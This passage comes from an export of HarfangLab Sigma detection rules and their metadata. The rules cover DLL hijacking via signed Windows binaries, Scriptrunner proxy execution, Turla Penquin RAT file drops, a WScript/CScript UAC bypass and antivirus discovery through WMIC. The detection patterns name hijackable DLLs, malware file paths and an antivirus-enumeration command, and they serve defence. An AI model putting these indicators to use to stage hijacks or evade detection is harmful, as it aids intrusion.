'?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3c24db86-ccf8-47c4-8cd0-8fc0a0e0b4f2",
"rule_name": "DLL Hijacking via dmnotificationbroker.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dmnotificationbroker.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3c4e7150-691f-44ce-b899-5ce197963e39",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081678Z",
"creation_date": "2026-03-23T11:45:34.081680Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081685Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_whoami.yml",
"content": "title: DLL Hijacking via whoami.exe\nid: 3c4e7150-691f-44ce-b899-5ce197963e39\ndescription: |\n Detects potential Windows DLL Hijacking via whoami.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'whoami.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\AUTHZ.dll'\n - '\\netutils.dll'\n - '\\SspiCli.dll'\n - '\\version.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3c4e7150-691f-44ce-b899-5ce197963e39",
"rule_name": "DLL Hijacking via whoami.exe",
"rule_description": "Detects potential Windows DLL Hijacking via whoami.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3c604ffa-3752-4605-b05e-b1f5945d7fc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.080350Z",
"creation_date": "2026-03-23T11:45:34.080352Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.080356Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/",
"https://attack.mitre.org/techniques/T1202/",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1202_indirect_command_execution_scriptrunner.yml",
"content": "title: Indirect Command Executed via Scriptrunner.exe\nid: 3c604ffa-3752-4605-b05e-b1f5945d7fc5\ndescription: |\n Detects the execution of the legitimate Scriptrunner.exe Windows binary, used to provide an interface between the Command Prompt and Windows Explorer.\n Attackers may abuse it to bypass security restrictions by using Scriptrunner to proxy the execution of other binaries.\n It is recommended to investigate the file provided in the command-line to determine whether this action was legitimate.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Scriptrunner/\n - https://attack.mitre.org/techniques/T1202/\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/02\nmodified: 2025/01/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Scriptrunner\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\Scriptrunner.exe'\n - OriginalFileName: 'Scriptrunner.exe'\n\n selection_args:\n CommandLine|contains: 'appvscript '\n\n exclusion_kopia:\n CommandLine: 'ScriptRunner.exe -appvscript KopiaUI-Setup-*.exe /S /allusers /disableAutoUpdates -appvscriptrunnerparameters -wait -timeout=300'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3c604ffa-3752-4605-b05e-b1f5945d7fc5",
"rule_name": "Indirect Command Executed via Scriptrunner.exe",
"rule_description": "Detects the execution of the legitimate Scriptrunner.exe Windows binary, used to provide an interface between the Command Prompt and Windows Explorer.\nAttackers may abuse it to bypass security restrictions by using Scriptrunner to proxy the execution of other binaries.\nIt is recommended to investigate the file provided in the command-line to determine whether this action was legitimate.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-01-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3c84803e-609a-4dfe-8406-a744c8d5ce88",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098165Z",
"creation_date": "2026-03-23T11:45:34.098167Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098171Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_fsquirt.yml",
"content": "title: DLL Hijacking via fsquirt.exe\nid: 3c84803e-609a-4dfe-8406-a744c8d5ce88\ndescription: |\n Detects potential Windows DLL Hijacking via fsquirt.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'fsquirt.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\DEVOBJ.dll'\n - '\\dwmapi.dll'\n - '\\mswsock.dll'\n - '\\OLEACC.dll'\n - '\\powrprof.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3c84803e-609a-4dfe-8406-a744c8d5ce88",
"rule_name": "DLL Hijacking via fsquirt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via fsquirt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3cb2591b-d815-4683-980f-4d8f4073576a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098712Z",
"creation_date": "2026-03-23T11:45:34.098714Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098719Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/revil-ransomware-uses-dll-sideloading/",
"https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/",
"https://www.fortinet.com/blog/threat-research/dll-side-loading-technique-used-in-recent-kaseya-ransomware-attack",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_msmpeng.yml",
"content": "title: DLL Hijacking via MsMpEng.exe\nid: 3cb2591b-d815-4683-980f-4d8f4073576a\ndescription: |\n Detects potential Windows DLL Hijacking via MsMpEng.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.mcafee.com/blogs/other-blogs/mcafee-labs/revil-ransomware-uses-dll-sideloading/\n - https://news.sophos.com/en-us/2020/11/04/a-new-apt-uses-dll-side-loads-to-killlsomeone/\n - https://www.fortinet.com/blog/threat-research/dll-side-loading-technique-used-in-recent-kaseya-ransomware-attack\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'MsMpEng.exe'\n ProcessSignature: 'Microsoft Windows Publisher'\n ImageLoaded|endswith:\n - '\\mpsvc.dll'\n - '\\vftrace.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n - '?:\\Program Files\\Windows Defender\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3cb2591b-d815-4683-980f-4d8f4073576a",
"rule_name": "DLL Hijacking via MsMpEng.exe",
"rule_description": "Detects potential Windows DLL Hijacking via MsMpEng.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3cbf8724-1817-4afc-88cf-2dc0f1eb9faa",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.088359Z",
"creation_date": "2026-03-23T11:45:34.088362Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.088366Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/tactics/TA0002/",
"https://attack.mitre.org/groups/G0010/",
"https://attack.mitre.org/software/S0587/"
],
"name": "t1105_penquin_turla_suspicious_file_creation.yml",
"content": "title: Suspicious File Creation Related to Penquin\nid: 3cbf8724-1817-4afc-88cf-2dc0f1eb9faa\ndescription: |\n Detects the creation of files with names linked to the malware Penquin.\n Penquin is a remote access trojan (RAT) used by the Turla attacker group to target Linux systems since at least 2014.\n Those names are related to files that are downloaded from the C&C server to be executed.\n It is recommended to investigate the process tree for suspicious activities.\nreferences:\n - https://www.leonardo.com/documents/20142/10868623/Malware+Technical+Insight+_Turla+%E2%80%9CPenquin_x64%E2%80%9D.pdf\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/tactics/TA0002/\n - https://attack.mitre.org/groups/G0010/\n - https://attack.mitre.org/software/S0587/\ndate: 2023/01/11\nmodified: 2025/01/15\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.command_and_control\n - attack.t1105\n - attack.g0010\n - attack.s0587\n - classification.Linux.Source.Filesystem\n - classification.Linux.Malware.Penquin\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'access'\n Permissions: 'write'\n Path:\n - '/tmp/.xdfg' # Penquin, Penquin_2.0\n - '/root/.session' # Penquin_x64\n - '/root/.hsperfdata' # Penquin_x64\n - '/tmp/.sync.pid' # Penquin_x64\n condition: selection\nlevel: critical\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3cbf8724-1817-4afc-88cf-2dc0f1eb9faa",
"rule_name": "Suspicious File Creation Related to Penquin",
"rule_description": "Detects the creation of files with names linked to the malware Penquin.\nPenquin is a remote access trojan (RAT) used by the Turla attacker group to target Linux systems since at least 2014.\nThose names are related to files that are downloaded from the C&C server to be executed.\nIt is recommended to investigate the process tree for suspicious activities.\n",
"rule_creation_date": "2023-01-11",
"rule_modified_date": "2025-01-15",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1105"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3d365b91-4487-438a-badb-29c05c867216",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074427Z",
"creation_date": "2026-03-23T11:45:34.074429Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074434Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://web.archive.org/web/20150908225350/https://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_prepare_uac_bypass_script_engine.yml",
"content": "title: WScript/CScript UAC Bypass Prepared\nid: 3d365b91-4487-438a-badb-29c05c867216\ndescription: |\n Detects the preparation of a UAC bypass via wscript.exe or cscript.exe via the creation of a XScript.manifest file.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the filesystem change to look for malicious content or actions.\nreferences:\n - https://web.archive.org/web/20150908225350/https://seclist.us/uac-bypass-vulnerability-in-the-windows-script-host.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/10/26\nmodified: 2025/01/13\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1059.005\n - attack.t1059.007\n - classification.Windows.Source.Filesystem\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '\\wscript.exe.manifest'\n - '\\cscript.exe.manifest'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3d365b91-4487-438a-badb-29c05c867216",
"rule_name": "WScript/CScript UAC Bypass Prepared",
"rule_description": "Detects the preparation of a UAC bypass via wscript.exe or cscript.exe via the creation of a XScript.manifest file.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the filesystem change to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-26",
"rule_modified_date": "2025-01-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1059.005",
"attack.t1059.007",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3d4e7e23-3983-42cc-a582-3c2daece8466",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622543Z",
"creation_date": "2026-03-23T11:45:34.622545Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622549Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic",
"https://attack.mitre.org/techniques/T1518/001/"
],
"name": "t1518_001_security_software_discovery.yml",
"content": "title: Security Software Product Discovered via WMIC\nid: 3d4e7e23-3983-42cc-a582-3c2daece8466\ndescription: |\n Detects the discovery of the main security software product using WMIC.\n Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment.\n It is recommended to analyze WMIC's parent process to look for malicious content or other malicious actions.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic\n - https://attack.mitre.org/techniques/T1518/001/\ndate: 2021/04/02\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1518.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct\n selection_1:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n selection_2:\n - CommandLine|contains|all:\n - '/Namespace'\n - 'SecurityCenter'\n - 'Path'\n - 'AntiVirusProduct'\n\n # Some uninstall/install scripts check for a single instance of a\n # security product.\n exclusion_specific_instanceguid:\n CommandLine|contains: 'instanceGuid=*{????????-????-????-????-????????????}'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_jetbrains:\n CommandLine:\n - 'wmic /Namespace:\\\\root\\SecurityCenter2 Path AntivirusProduct Get displayName,productState' # old agent\n - 'wmic /Namespace:\\\\\\\\root\\SecurityCenter2 Path AntivirusProduct Get displayName,productState' # new agent\n # C:\\Program Files\\JetBrains\\IntelliJ IDEA 2020.3.1\\bin\\idea64.exe\n # C:\\Program Files\\JetBrains\\PyCharm Community Edition 2021.1.1\\bin\\pycharm64.exe\n # C:\\Program Files\\JetBrains\\WebStorm 2021.2.1\\bin\\webstorm64.exe\n # C:\\Program Files\\JetBrains\\DataGrip 2021.2\\bin\\datagrip64.exe\n # C:\\Program Files\\JetBrains\\PhpStorm 2020.3.3\\bin\\phpstorm64.exe\n ParentImage|endswith:\n - '\\bin\\idea64.exe'\n - '\\bin\\pycharm64.exe'\n - '\\bin\\webstorm64.exe'\n - '\\bin\\datagrip64.exe'\n - '\\bin\\phpstorm64.exe'\n - '\\bin\\rider64.exe'\n\n exclusion_sophos:\n ParentImage: '?:\\Program Files (x86)\\Sophos\\Sophos Diagnostic Utility\\sdugui.exe'\n\n exclusion_meshagent:\n ParentImage: '?:\\Program Files\\Mesh Agent\\MeshAgent.exe'\n CommandLine: 'wmic /Namespace:\\\\\\\\root\\SecurityCenter2 Path AntiVirusProduct get /FORMAT:CSV'\n\n exclusion_trendmicro:\n ParentImage|endswith: '\\SCUT.exe'\n ProcessParentSignature: 'Trend Micro, Inc.'\n\n exclusion_fsecure:\n ProcessParentImage:\n - '?:\\Program Files\\f-secure\\server security\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files (x86)\\f-secure\\server security\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files\\f-secure\\psb\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files (x86)\\f-secure\\psb\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files\\f-secure\\client security\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files (x86)\\f-secure\\client security\\diagnostics\\fsdiag.exe'\n - '?:\\Program Files\\Withsecure\\policy manager\\diagnostics\\wsdiag.exe'\n - '?:\\Program Files (x86)\\Withsecure\\policy manager\\diagnostics\\wsdiag.exe'\n\n # https://rmm.datto.com/help/en/Content/5AGENT/Agent.htm\n exclusion_datto:\n GrandparentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n\n exclusion_intellij:\n ParentImage|endswith: '\\intelliJ\\app\\jbr\\bin\\java.exe'\n ParentCommandLine|contains: '\\intelliJ\\app\\lib\\extensions.jar'\n\n exclusion_intunes:\n Ancestors|contains:\n - '?:\\Program Files\\Microsoft Intune Management Extension\\'\n - '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\'\n\n exclusion_simplehelp:\n ParentImage: '?:\\ProgramData\\JWrapper-Remote Access\\JWrapper-Windows*\\bin\\Remote Access.exe'\n\n exclusion_papercut:\n ParentCommandLine|contains: '/value > 